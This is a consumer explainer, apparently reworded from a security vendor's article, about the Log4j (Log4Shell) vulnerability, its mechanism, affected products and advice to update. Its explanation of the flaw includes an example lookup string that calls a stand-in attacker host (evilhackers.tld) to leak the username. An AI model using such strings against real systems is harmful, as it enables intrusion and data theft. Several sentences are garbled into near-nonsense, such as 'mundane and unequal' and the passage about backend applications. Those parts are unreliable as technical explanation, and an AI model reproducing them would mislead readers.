A new software vulnerability may exist on many of the platforms and services you use every day. A software bug called Log4J is potentially present in everything Android call to Minecraft gaming platform. The question on the minds of many consumers: What should we do? by security firm nortonThe best thing to do, is to update your system and applications. Make sure you are running the latest version. That way, you can be sure that your program has the latest patches that fix software bugs.
Here’s what you need to know about the Log4j software vulnerability, how it could affect you, and what’s being done, according to Norton’s experts.
The new software vulnerability affects a component that is prevalent, but not well known by average users: Log4j. This vulnerability – or bug – has got the nickname Log4shell.
Apache Log4j is an open-source software library used by many Java Programs to process and log events such as errors. Most people have probably heard of Java. This cross-platform software is used in many applications used by common people and companies alike. According to Oracle, Manager of Java Technology, over 13 billion devices run Java (as of 2015).
Do you play Minecraft? You are using java. Do you have an Android phone? You are using java. Do you have Smart TV? Chances are it’s running Java. Google, linkedin, and use Amazon Java. Java is everywhere. And that means this software flaw is almost everywhere as well.
What does the bug do?
The log4j logging library processes different types of text, such as text in a chat room, web server logs, etc. Generally it is mundane and unequal. However, it goes astray when it comes to sentences of a certain format. Log4j expands one thing variable. It thinks that a statement on the form “${something}” means that something is a variable, and it should replace it with some other value; For example, the current date.
However, there may be some specially crafted URL, and this can cause Log4j to try to fetch values to be filled from the remote site. This information leaks: ${jndi:ldap://evilhackers.tld/$env:USERNAME}}. If the URL points to a Java class file – that is, Java program code – the code is fetched, inserted into memory and runs without checking whether the code is valid. This is known as Remote Code Execution (RCE) and is a very serious security flaw.
Log4j is used by many of the backend tools that underpin some of the most critical Internet infrastructure we have today, so an exploit may not occur immediately, but can travel up the application stack to backend applications, which no one knows about. Also haven’t been thinking for years suddenly wants to get malicious code up and running. Additionally, log4shell can be used to break into various Internet services and steal customer data, which can then be used for malicious activity such as identity theft. Ransomware attacks can affect people’s workplaces.
Attacks can also be automated, and scanning for this bug has been going on for some time already and has been used to install malware such as coin miners and ransomware. Although servers are the primary concern, client programs are also vulnerable making this a potential problem for home users. Consumers running vulnerable programs such as Minecraft (which has now been patched) could be attacked by connecting to a malicious server (which Microsoft noticed). Compromising consumer systems can lead to the theft of login credentials, financial information, and the installation of malware such as cryptominers.
Which products are unsafe?
The vulnerable versions of Apache Log4j are versions from 2.0 to 2.15. New patched versions have been released, but it will take a long time to update these everywhere Log4j is used. As this vulnerability is still being researched, additional patched versions are likely.
The list of vulnerable and potentially vulnerable products that use Log4j is long. An overview is maintained by CISA, but some of the largest software vendors and products available have been described as somewhat vulnerable. These include Microsoft, IBM, Amazon, Apache, Akamai, Atlassian, Broadcom, Cisco – and the list goes on.
What can you do as a home user?
Apart from keeping their devices as updated as possible, there isn’t much that one can do. If you run any type of Java-enabled server – for example, a Minecraft server – you should make sure all the latest patches are applied.
What are the broad risks of the defect?
Cybercriminals can potentially use the flaw to break into various Internet services and steal user data. That information can be used for more malicious activity such as identity theft.
Are Internet-connected devices at risk?
It’s possible that Internet-enabled consumer electronics are at risk. Smart TVs, DVRs, security cameras – if they run a Java-enabled Apache webserver – can be vulnerable and can be captured by criminals.
,